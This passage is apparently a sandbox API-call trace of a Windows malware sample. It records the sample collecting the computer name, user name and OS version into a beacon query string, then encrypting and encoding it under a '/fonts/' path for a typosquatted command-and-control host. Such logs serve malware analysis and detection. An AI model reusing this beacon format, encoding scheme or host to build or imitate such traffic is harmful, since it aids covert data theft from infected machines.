lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0069.164] GetLastError () returned 0x3e5 [0069.164] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x102 [0069.164] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0069.165] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0069.301] WaitForSingleObject (hHandle=0x1c8, dwMilliseconds=0x0) returned 0x0 [0069.301] SetEvent (hEvent=0x1c8) returned 1 [0069.301] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0069.301] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0069.302] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c59c90 [0069.302] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c59c90, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c59c90*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0069.302] ResetEvent (hEvent=0x1c8) returned 1 [0069.303] GetProcAddress (hModule=0x75b50000, lpProcName="InternetReadFile") returned 0x75b6b406 [0069.303] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0069.303] GetProcAddress (hModule=0x756b0000, lpProcName="CreateStreamOnHGlobal") returned 0x756d363b [0069.304] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0069.304] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x794308) returned 0x0 [0069.305] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2c5bc48 [0069.305] ISequentialStream:RemoteWrite (in: This=0x794308, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.305] ResetEvent (hEvent=0x1c8) returned 1 [0069.305] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c5bc48, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2c5bc48*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0069.305] ISequentialStream:RemoteWrite (in: This=0x794308, pv=0x2c5bc48*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.305] ResetEvent (hEvent=0x1c8) returned 1 [0069.306] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2c5bc48, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2c5bc48*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0069.306] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5bc48 | out: hHeap=0x2860000) returned 1 [0069.306] IStream:RemoteSeek (in: This=0x794308, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0069.306] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5bc48 [0069.307] ISequentialStream:RemoteRead (in: This=0x794308, pv=0x2c5bc48, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5bc48*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0069.307] IUnknown:Release (This=0x794308) returned 0x0 [0069.307] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0069.307] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0069.307] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0069.307] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0069.307] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0069.307] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0069.307] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0069.307] CloseHandle (hObject=0x1c8) returned 1 [0069.307] CloseHandle (hObject=0x1c4) returned 1 [0069.307] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5bc48 | out: hHeap=0x2860000) returned 1 [0069.308] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c90 | out: hHeap=0x2860000) returned 1 [0069.308] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b690 | out: hHeap=0x2860000) returned 1 [0069.308] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b980 | out: hHeap=0x2860000) returned 1 [0069.309] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0069.309] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0069.310] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ad18 | out: hHeap=0x2860000) returned 1 [0069.310] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0069.310] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0069.310] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0069.311] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0079.334] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0079.334] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0079.334] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0079.334] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0079.334] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2765467713273) returned 1 [0079.334] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=27654") returned 13 [0079.334] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0079.335] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0079.335] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0079.336] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c59a68 [0079.336] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c59a68, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0079.336] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0079.336] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0079.336] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0079.338] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0079.339] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0079.339] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0079.339] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0079.339] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHUdn38dGd/TJCs4UupBl44_2BJ/k", lpUsedDefaultChar=0x0) returned 20 [0079.340] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0079.341] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0079.341] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net") returned 38 [0079.341] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c59a68 [0079.341] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e4b, _Size=0x26 | out: _Dst=0x2c59a68) returned 0x2c59a68 [0079.341] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0079.341] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5ad18 [0079.341] GetTickCount () returned 0x1a30348 [0079.341] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x9) returned 0x2c59b28 [0079.341] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xa) returned 0x2c59b40 [0079.341] lstrlenA (lpString="%s=%s&") returned 6 [0079.342] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x18) returned 0x2c59b58 [0079.342] sprintf (_Dest=0x2c59b58, _Format="%s=%s&") [0079.342] sprintf (in: _Dest=0x2c59b58, _Format="%s=%s&" | out: _Dest="xoaaqpdie=fjtlivwh&") returned 19 [0079.342] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b40 | out: hHeap=0x2860000) returned 1 [0079.342] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0079.342] lstrlenA (lpString="xoaaqpdie=fjtlivwh&") returned 19 [0079.342] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27654&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0079.342] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd9) returned 0x2c59b78 [0079.342] strcpy (in: _Dest=0x2c59b78, _Source="xoaaqpdie=fjtlivwh&" | out: _Dest="xoaaqpdie=fjtlivwh&") returned="xoaaqpdie=fjtlivwh&" [0079.342] lstrcatA (in: lpString1="xoaaqpdie=fjtlivwh&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27654&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="xoaaqpdie=fjtlivwh&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27654&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="xoaaqpdie=fjtlivwh&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27654&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0079.342] lstrlenA (lpString="xoaaqpdie=fjtlivwh&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27654&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 216 [0079.342] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0079.344] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0079.344] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0079.344] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0079.344] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c60 [0079.344] memcpy (in: _Dst=0x2c59c60, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c60) returned 0x2c59c60 [0079.344] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.344] memcpy (in: _Dst=0x2c59c70, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c70) returned 0x2c59c70 [0079.344] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.344] memcpy (in: _Dst=0x2c59c80, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c80) returned 0x2c59c80 [0079.344] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.344] memcpy (in: _Dst=0x2c59c90, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c90) returned 0x2c59c90 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59ca0, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59ca0) returned 0x2c59ca0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59cb0, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59cb0) returned 0x2c59cb0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59cc0, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cc0) returned 0x2c59cc0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59cd0, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cd0) returned 0x2c59cd0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59ce0, _Src=0x2c59bf8, _Size=0x10 | out: _Dst=0x2c59ce0) returned 0x2c59ce0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59cf0, _Src=0x2c59c08, _Size=0x10 | out: _Dst=0x2c59cf0) returned 0x2c59cf0 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59d00, _Src=0x2c59c18, _Size=0x10 | out: _Dst=0x2c59d00) returned 0x2c59d00 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59d10, _Src=0x2c59c28, _Size=0x10 | out: _Dst=0x2c59d10) returned 0x2c59d10 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59d20, _Src=0x2c59c38, _Size=0x10 | out: _Dst=0x2c59d20) returned 0x2c59d20 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] memcpy (in: _Dst=0x2c59d30, _Src=0x2c59c48, _Size=0x9 | out: _Dst=0x2c59d30) returned 0x2c59d30 [0079.345] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d30*, pdwDataLen=0x11ff074*=0x9, dwBufLen=0x20 | out: pbData=0x2c59d30*, pdwDataLen=0x11ff074*=0x10) returned 1 [0079.345] CryptDestroyKey (hKey=0x77d378) returned 1 [0079.345] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0079.345] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5b520 [0079.346] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c60 | out: hHeap=0x2860000) returned 1 [0079.347] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b78 | out: hHeap=0x2860000) returned 1 [0079.347] StrTrimA (in: psz="FFu8QJqgB45OXgFmN1iqmUxw2HBsgItuiWx/fn6yA8FahHjwziTPKhum2D9fBKyX7ozBxQKlSXKqv4XTxTypCdHco1iPpSzkI9SkSdK72L9Co+3EDiJCiR7QDyAxgAw8eGUl6IQr+Kcfb2EUsx9i/O2EYDVpxUkFKJKUOYQN2h9OgbNENHmeyZMsifqv0VhPPDwdQhvoLu3/q15rtR0l1huLjjYSOT6JSN0BrR+0LEXNLC53k4bIksPVMK24DeDBHKgRxewTpOp0ZG/DdTDDZbFE840hFpoB7V+enfrMNoH=", pszTrimChars="\r\n=" | out: psz="FFu8QJqgB45OXgFmN1iqmUxw2HBsgItuiWx/fn6yA8FahHjwziTPKhum2D9fBKyX7ozBxQKlSXKqv4XTxTypCdHco1iPpSzkI9SkSdK72L9Co+3EDiJCiR7QDyAxgAw8eGUl6IQr+Kcfb2EUsx9i/O2EYDVpxUkFKJKUOYQN2h9OgbNENHmeyZMsifqv0VhPPDwdQhvoLu3/q15rtR0l1huLjjYSOT6JSN0BrR+0LEXNLC53k4bIksPVMK24DeDBHKgRxewTpOp0ZG/DdTDDZbFE840hFpoB7V+enfrMNoH") returned 1 [0079.347] lstrlenA (lpString="FFu8QJqgB45OXgFmN1iqmUxw2HBsgItuiWx/fn6yA8FahHjwziTPKhum2D9fBKyX7ozBxQKlSXKqv4XTxTypCdHco1iPpSzkI9SkSdK72L9Co+3EDiJCiR7QDyAxgAw8eGUl6IQr+Kcfb2EUsx9i/O2EYDVpxUkFKJKUOYQN2h9OgbNENHmeyZMsifqv0VhPPDwdQhvoLu3/q15rtR0l1huLjjYSOT6JSN0BrR+0LEXNLC53k4bIksPVMK24DeDBHKgRxewTpOp0ZG/DdTDDZbFE840hFpoB7V+enfrMNoH") returned 299 [0079.347] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5b6e8 [0079.347] _snprintf (_Dest=0x2c5b70b, _Count=0x4, _Format="%c%02X") [0079.347] _snprintf (in: _Dest=0x2c5b70b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b757, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b774, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b782, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b7bb, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b7d8, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b802, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0079.347] _snprintf (in: _Dest=0x2c5b818, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0079.347] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0079.348] lstrlenA (lpString="FFu8QJqgB45OXgFmN1iqmUxw2HBsgItuiWx_2Ffn6yA8FahHjwziTPKhum2D9fBKyX7ozBxQKlSXKqv4XTxTypCdHco1iPpSzkI9SkSdK72L9Co_2B3EDiJCiR7QDyAxgAw8eGUl6IQr_2BKcfb2EUsx9i_2FO2EYDVpxUkFKJKUOYQN2h9OgbNENHmeyZMsifqv0VhPPDwdQhvoLu3_2Fq15rtR0l1huLjjYSOT6JSN0BrR_2B0LEXNLC53k4bIksPVMK24DeDBHKgRxewTpOp0ZG_2FDdTDDZbFE840hFpoB7V_2BenfrMNoH") returned 315 [0079.348] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x163) returned 0x2c5b520 [0079.348] memcpy (in: _Dst=0x2c5b520, _Src=0x2c5b6e8, _Size=0x13 | out: _Dst=0x2c5b520) returned 0x2c5b520 [0079.348] memcpy (in: _Dst=0x2c5b534, _Src=0x2c5b6fb, _Size=0x16 | out: _Dst=0x2c5b534) returned 0x2c5b534 [0079.348] memcpy (in: _Dst=0x2c5b54b, _Src=0x2c5b711, _Size=0xd | out: _Dst=0x2c5b54b) returned 0x2c5b54b [0079.348] memcpy (in: _Dst=0x2c5b559, _Src=0x2c5b71e, _Size=0x8 | out: _Dst=0x2c5b559) returned 0x2c5b559 [0079.348] memcpy (in: _Dst=0x2c5b562, _Src=0x2c5b726, _Size=0x17 | out: _Dst=0x2c5b562) returned 0x2c5b562 [0079.348] memcpy (in: _Dst=0x2c5b57a, _Src=0x2c5b73d, _Size=0xa | out: _Dst=0x2c5b57a) returned 0x2c5b57a [0079.348] memcpy (in: _Dst=0x2c5b585, _Src=0x2c5b747, _Size=0x11 | out: _Dst=0x2c5b585) returned 0x2c5b585 [0079.348] memcpy (in: _Dst=0x2c5b597, _Src=0x2c5b758, _Size=0xc | out: _Dst=0x2c5b597) returned 0x2c5b597 [0079.348] memcpy (in: _Dst=0x2c5b5a4, _Src=0x2c5b764, _Size=0xb | out: _Dst=0x2c5b5a4) returned 0x2c5b5a4 [0079.348] memcpy (in: _Dst=0x2c5b5b0, _Src=0x2c5b76f, _Size=0xe | out: _Dst=0x2c5b5b0) returned 0x2c5b5b0 [0079.348] memcpy (in: _Dst=0x2c5b5bf, _Src=0x2c5b77d, _Size=0x15 | out: _Dst=0x2c5b5bf) returned 0x2c5b5bf [0079.348] memcpy (in: _Dst=0x2c5b5d5, _Src=0x2c5b792, _Size=0x10 | out: _Dst=0x2c5b5d5) returned 0x2c5b5d5 [0079.348] memcpy (in: _Dst=0x2c5b5e6, _Src=0x2c5b7a2, _Size=0xf | out: _Dst=0x2c5b5e6) returned 0x2c5b5e6 [0079.348] memcpy (in: _Dst=0x2c5b5f6, _Src=0x2c5b7b1, _Size=0x12 | out: _Dst=0x2c5b5f6) returned 0x2c5b5f6 [0079.348] memcpy (in: _Dst=0x2c5b609, _Src=0x2c5b7c3, _Size=0x9 | out: _Dst=0x2c5b609) returned 0x2c5b609 [0079.348] memcpy (in: _Dst=0x2c5b613, _Src=0x2c5b7cc, _Size=0x14 | out: _Dst=0x2c5b613) returned 0x2c5b613 [0079.348] memcpy (in: _Dst=0x2c5b628, _Src=0x2c5b7e0, _Size=0x13 | out: _Dst=0x2c5b628) returned 0x2c5b628 [0079.348] memcpy (in: _Dst=0x2c5b63c, _Src=0x2c5b7f3, _Size=0x16 | out: _Dst=0x2c5b63c) returned 0x2c5b63c [0079.348] memcpy (in: _Dst=0x2c5b653, _Src=0x2c5b809, _Size=0xd | out: _Dst=0x2c5b653) returned 0x2c5b653 [0079.348] memcpy (in: _Dst=0x2c5b661, _Src=0x2c5b816, _Size=0xc | out: _Dst=0x2c5b661) returned 0x2c5b661 [0079.348] memcpy (in: _Dst=0x2c5b66e, _Src=0x2c5b822, _Size=0x2 | out: _Dst=0x2c5b66e) returned 0x2c5b66e [0079.349] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b6e8 | out: hHeap=0x2860000) returned 1 [0079.349] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b58 | out: hHeap=0x2860000) returned 1 [0079.349] StrTrimA (in: psz="FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H", pszTrimChars="\r\n" | out: psz="FFu8QJqgB45OXgFmN1i/qmUxw2HBsgItuiWx_2Ffn6/yA8FahHjwziTP/Khum2D9f/BKyX7ozBxQKlSXKqv4XTxTy/pCdHco1iPp/SzkI9SkSdK72L9Co_/2B3EDiJCiR7Q/DyAxgAw8eGU/l6IQr_2BKcfb2E/Usx9i_2FO2EYDVpxUkFKJ/KUOYQN2h9OgbNENH/meyZMsifqv0VhPP/DwdQhvoLu3_2Fq15rt/R0l1huLjj/YSOT6JSN0BrR_2B0LEXN/LC53k4bIksPVMK24DeD/BHKgRxewTpOp0ZG_2FDdTD/DZbFE840hFpoB/7V_2BenfrMNo/H") returned 0 [0079.349] lstrlenA (lpString="/fonts/") returned 7 [0079.349] lstrlenA 